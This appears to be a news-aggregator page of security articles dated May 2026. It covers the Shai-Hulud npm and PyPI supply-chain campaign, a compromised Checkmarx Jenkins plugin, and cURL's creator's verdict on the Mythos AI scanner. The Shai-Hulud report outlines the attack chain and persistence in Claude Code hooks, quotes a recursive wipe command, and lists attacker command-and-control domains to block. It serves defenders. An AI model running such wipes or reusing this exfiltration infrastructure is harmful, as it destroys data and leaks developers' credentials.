GitHub Personal Access Tokens (PAT), chiavi di accesso ai fornitori cloud e certificati di deployment. Monitoraggio di Rete: Implementare filtri in uscita sugli agenti di build per bloccare connessioni verso domini non censiti o endpoint sospetti utilizzati per l'esfiltrazione dei dati. Bonifica degli Ambienti: Eseguire la scansione degli ambienti di sviluppo locali per individuare la presenza di processi persistenti o modifiche non autorizzate ai file di configurazione globale di npm (.npmrc).
acn.gov.itMay 12, 2026extracted
Shai Hulud attack ships signed malicious TanStack, Mistral npm packages
Hundreds of packages across npm and PyPI have been compromised in a new Shai-Hulud supply-chain campaign delivering credential-stealing malware targeting developers. The attacker hijacked valid OpenID Connect (OIDC) tokens to publish malicious package versions with verifiable provenance attestation (SLSA Build Level 3). Attributed to the TeamPCP threat group, the attack started with compromising dozens of TanStack and Mistral AI packages but quickly extended to other popular projects, like Guardrails AI, UiPath, and OpenSearch. The Shai-Hulud campaign emerged last September and had multiple iterations [1, 2, 3], some of them exposing hundreds of thousands of developer secrets in automatically generated GitHub repositories. Among more recently compromised projects are the Bitwarden CLI package and the official SAP packages. The latest attack wave occurred yesterday with the threat actor publishing multiple malicious packages in the TanStack namespaces on the Node Package Manager (npm), and then spreading to other projects using stolen CI/CD credentials. Application security company StepSecurity notes that the threat actor published the infected packages via the legitimate CI/CD pipeline, carrying valid SLSA provenance attestations issued by npm's signing infrastructure and "tied to the legitimate TanStack/router Release workflow." Endor Labs reports over 160 compromised packages on npm, Aikido recorded 373 malicious package-version entries, and Socket tracked 416 compromised package artifacts across npm and the Python Package Index (PyPI). According to TanStack's post-mortem report from TanStack, the attackers chained three vulnerabilities: a risky ‘pull_request-target’ workflow, GitHub Actions cache poisoning, and OIDC token theft from runner memory. The attackers published 84 malicious versions across 42 TanStack packages that had valid provenance, valid Sigstore attestations, and legitimate GitHub Actions signatures. From a developer’s perspective, the packages appeared to be cryptographically authentic, and there was no indication of a compromise. Endor Labs highlights a clever Git commit trick in which attackers abused an orphaned commit pushed to a fork of the TanStack/router repository, making it accessible through GitHub’s shared fork object storage even though it didn't belong to any branch. The commit was referenced via a malicious optional dependency, causing npm to automatically fetch and execute attacker-controlled code during package installation. The malware targets developer secrets, including: GitHub Actions OIDC tokens and PATs Git credentials npm publish tokens AWS Secrets Manager, IAM, and ESC task credentials Kubernetes service account tokens and cluster credentials HashiCorp Vault tokens SSH keys Claude Code configs VS Code tasks .env files StepSecurity says that the payload reads the GitHub Actions process memory to collect credentials from more than 100 file paths associated with cloud providers, cryptocurrency tokens, and messaging apps. To exfiltrate the sensitive information, the malware used the Session P2P network, making it appear as encrypted messenger traffic and complicating detection, blocking, and takedown efforts. Once an infection occurs, the malware writes itself into Claude Code hooks and VS Code auto-run tasks, so uninstalling the malicious packages does not remove it. The self-propagation mechanism remains largely unchanged from past waves: it uses stolen GitHub/npm credentials, enumerates the packages linked to the compromised maintainer, modifies tarballs to inject the payload, and then republishes malicious versions. According to supply-chain security platform SafeDep, although the trigger mechanism is different in compromised Mistral AI and TanStack packages, they drop the same credential-stealing payload. Microsoft Threat Intelligence analyzed the payload delivered via a malicious Mistral AI package on PyPI. The actor named it 'transformers.pyz', which may be to impersonate the Hugging Face open-source Python library Transformers used for accessing pre-trained models for natural language processing. The researchers say that payload drops an information-stealing malware on Linux systems. The stealer includes basic geofencing logic, specifically avoiding execution on hosts where Russian language settings are detected. A destructive secondary routine is also present. In environments that appear to originate from Israel or Iran, the malware introduces a probabilistic sabotage mechanism with a 1-in-6 chance of running a recursive wipe command (rm -rf/). The behavior resembles the CanisterWorm campaign that TeamPCP deployed in March and targeted Kubernetes platforms. If CanisterWorm landed on machines that matched Iran's timezone and locales, it would wipe it. Lists of compromised packages are available in the reports from various security vendors [1, 2, 3, 4, 5], and it is recommended to check all the resources for a complete view of the impact. Developers who downloaded an affected package version should assume that credentials were exposed. Researchers recommend that security teams take the following action: check for affected package versions check for persistence on developer machines rotate all credentials (GitHub tokens, npm tokens, AWS credentials, Vault tokens, Kubernetes service accounts, and CI/CD secrets) audit IDE directories for malicious files surviving npm install (e.g., router_runtime.js or setup.mjs) block the threat actor's command-and-control infrastructure (api.masscan.cloud, git-tanstack.com, and *.getsession.org) at DNS or proxy level Snyk researchers say that since the "attack produces valid SLSA Build Level 3 attestations for malicious packages," it is necessary to verify provenance and add a behavioral analysis layer at install time, along with a signature-based check for malicious packages. In the long term, to mitigate the risk from similar attacks, consider enforcing lockfile-only installs, which should prevent auto/silent package updates. UPDATE [08:36 EST]: Added information from Microsoft Threat Intelligence's analysis of a payload delivered via a compromised Mistral AI package. Overall prevention scores can hide what happens after initial access. Once attackers are using valid credentials, prevention drops sharply. The Blue Report 2026 measures defenses technique by technique across 338 million simulations run in customer production environments. Get the report
bleepingcomputer.comMay 12, 2026extracted
Official CheckMarx Jenkins package compromised with infostealer
Checkmarx warned over the weekend that a rogue version of its Jenkins Application Security Testing (AST) plugin had been published on the Jenkins Marketplace. The compromise was claimed by the TeamPCP hacker group, which initiated a spree of supply-chain attacks that included the Shai-Hulud campaigns on npm and the Trivy vulnerability scanner breach, resulting in the delivery of credential-stealing malware. Jenkins is one of the most widely used Continuous Integration/Continuous Deployment (CI/CD) automation solutions for software building, testing, code scanning, application packaging, and deploying updates to servers. The Checkmarx AST plugin on the Jenkins Marketplace integrates security scanning into automated pipelines. “We are aware that a modified version of the Checkmarx Jenkins AST plugin was published to the Jenkins Marketplace. We are in the process of publishing a new version of this plug-in,” Checkmarx alerted in the update. This is the third incident in a series of supply-chain attacks the application security testing firm has suffered since late March. According to offensive security engineer Adnand Khan, TeamPCP gained access to Checkmarx's GitHub repositories and backdoored the Jenkins AST plugin to deliver credential-stealing malware. A company spokesperson confirmed to BleepingComputer that the threat actor obtained credentials to the repositories from the Trivy supply-chain attack in March. A message the hackers left in the about section reads: "Checkmarx fails to rotate secrets again. With love - TeamPCP." "As a result of that access, the attackers were able to interact with Checkmarx’s GitHub environment and subsequently publish malicious code to certain artifacts," the company spokesperson stated. Using credentials stolen in the Trivy attack, the hackers published modified versions of multiple developer tools on GitHub, Docker, and VSCode that included info-stealing code. The threat actor maintained access for at least a month and then published a malicious version of the company's KICS analysis tool on Docker, Open VSX, and VSCode, which harvested data from developer environments. In late April, the company confirmed that the LAPSUS$ threat group leaked data stolen from its private GitHub repository. On Saturday, May 9, a rogue version (2026.5.09 ) of the Checkmarx Jenkins AST plugin was uploaded to repo.jenkins-ci.org. The update was outside the plugin's release pipeline and included malicious code. Apart from not following the official date style scheme, the malicious plugin lacked a git tag and a GitHub release. Checkmarx advised users to ensure that they are using version 2.0.13-829.vc72453fa_1c16 of the plugin published on December 17, 2025, or an older one. Although Checkmarx hasn’t shared any details about what the rogue Jenkins plugin does on systems, those who have downloaded the malicious version should assume that their credentials are compromised, rotate all secrets, and investigate for lateral movement or persistence. Checkmarx says that its GitHub repositories are isolated from its customer production environment, and no customer data is stored in the GitHub repository. "We have communicated with our customers throughout this process and will continue to provide relevant updates as more information becomes available," the cybersecurity company said, adding that customers can find recommendations on the Support Portal or in the Security Updates sections. Checkmarx has published a set of malicious artifacts that defenders can use as indicator of compromise (IoCs) on their envirronments. Overall prevention scores can hide what happens after initial access. Once attackers are using valid credentials, prevention drops sharply. The Blue Report 2026 measures defenses technique by technique across 338 million simulations run in customer production environments. Get the report
bleepingcomputer.comMay 11, 2026extracted
Anthropic’s bug-hunting Mythos was greatest marketing stunt ever, says cURL creator
cURL developer Daniel Stenberg has seen Anthropic’s Mythos, a model the AI biz has suggested is too capable at finding security holes to release publicly, scan his popular open source project. But after the system turned up just a single vulnerability, he concluded the hype around Mythos was “primarily marketing” rather than a major AI security breakthrough. Stenberg explained in a Monday blog post that he was promised access to Anthropic’s Mythos model - sort of - through the AI biz’s Project Glasswing program. Part of Glasswing involves giving high-profile open source projects access via the Linux Foundation, but while Stenberg signed up to try Mythos, he said he never actually received direct access to the model. Instead, someone else with access ran Mythos against curl’s codebase and later sent him a report. “It’s not that I would have a lot of time to explore lots of different prompts and doing deep dive adventures anyway,” Stenberg explained. “Getting the tool to generate a first proper scan and analysis would be great, whoever did it.” That scan, which analyzed curl’s git repository at a recent master-branch commit, was sent back to him earlier this month, and it found just five things that it claimed were “confirmed security vulnerabilities” in cURL. Saying he had expected an extensive list of vulnerabilities, Stenberg wrote that the report “felt like nothing,” and that feeling was further validated by a review of Mythos’ findings. “Once my curl security team fellows and I had poked on this short list for a number of hours and dug into the details, we had trimmed the list down and were left with one confirmed vulnerability,” Stenberg said, bringing us back to the aforementioned number. As for the other four, three turned out to be false positives that pointed out cURL shortcomings already noted in API documentation, while the team deemed the fourth to be just a simple bug. “The single confirmed vulnerability is going to end up a severity low CVE planned to get published in sync with our pending next curl release 8.21.0 in late June,” the cURL meister noted. “The flaw is not going to make anyone grasp for breath.” That said, Mythos did find several other non-security bugs that Stenberg said the team is working on fixing, and he notes that their description and explanation were well done. Mythos can do good work, in other words, but it’s not a ground-breaking, game-changing AI model like Anthropic has claimed. “My personal conclusion can however not end up with anything else than that the big hype around this model so far was primarily marketing,” Stenberg said in the blog post. “I see no evidence that this setup finds issues to any particular higher or more advanced degree than the other tools have done before Mythos.” cURL code is no stranger to AI To say cURL has become widely used in its nearly three decades of existence would be an understatement. Its wide reach has meant that its team has been running it through all sorts of static code analyzers and fuzz testing it since well before the dawn of the AI age. With AI’s rise, the cURL team has adapted, meaning Mythos is hardly the first AI to get its fingers on cURL’s codebase. “These tools and the analyses they have done have triggered somewhere between two and three hundred bugfixes merged in curl through-out the recent 8-10 months or so,” Stenberg said of tools like AISLE, Zeropath, and OpenAI Codex Security that’ve tested cURL code. “A bunch of the findings these AI tools reported were confirmed vulnerabilities and have been published as CVEs. Probably a dozen or more.” Stenberg’s experience with AI testing cURL, in other words, makes it a great candidate to see how effective Mythos can really be at finding more than the average AI. As Stenberg noted elsewhere in his blog post, Mythos isn’t doing anything particularly novel when it comes to security discoveries: It might be a bit better at finding things than previous models, but “it is not better to a degree that seems to make a significant dent in code analyzing,” the cURL author noted. Stenberg isn’t an AI doomer when it comes to its ability to improve software design, though. Yes, he may have closed the cURL bug bounty earlier this year due to an influx of sloppy, useless bug reports, but he also noted a few months prior to the bounty closure that some security researchers assisted by AI have made valuable reports. “AI powered code analyzers are significantly better at finding security flaws and mistakes in source code than any traditional code analyzers did in the past,” Stenberg said, adding an important qualifier for the Mythos moment: “All modern AI models are good at this now.” Mythos isn’t any more creative than its creators Both older AI models and security-focused tools like Mythos have a common limitation, as far as Stenberg is concerned: They’re only as good at finding security vulnerabilities as the humans who programmed them. “AI tools find the usual and established kind of errors we already know about. It just finds new instances of them,” Stenberg said. “We have not seen any AI so far report a vulnerability that would somehow be of a novel kind or something totally new.” As for Mythos, Stenberg remains unimpressed, calling it "an amazingly successful marketing stunt for sure" in his blog post. In an email to The Register, Stenberg admitted that it’d be possible for AI models to actually discover new, novel types of vulnerabilities, but he’s still not convinced that they can go beyond what humans are capable of finding, given that they’re limited by our understanding of how software vulnerabilities work. At the end of the day, Stenberg explained, when we talk about security, we’re only talking about code. “Source code is text and it feels like maybe we already know about most ways we can do security problems in it,” he pondered in his email. In other words, like the valuable AI-assisted reports made to the cURL bug bounty program before its closure due to a flood of AI garbage, making valuable use of systems like Mythos is going to require humans to get creative. Sorry, no foisting your critical thinking onto a bot. “Human researchers have always used tools when they look for security problems,” Stenberg told us. “Adding AIs to the mix gives the humans even more powerful tools to use, more ways to find problems. I expect that many security bugs going forward will be found by humans coming up with new ways and angles of prompting the AIs.” Stenberg said that he hopes he’ll actually get his hands on Mythos so he can experiment with its capabilities, but he doesn’t seem to be holding out hope the promised access will materialize. “I have been promised access and for all I know I will eventually get it,” Stenberg told us. “I just don't know when.” ®
theregister.comMay 11, 2026extracted
Loading 40 more…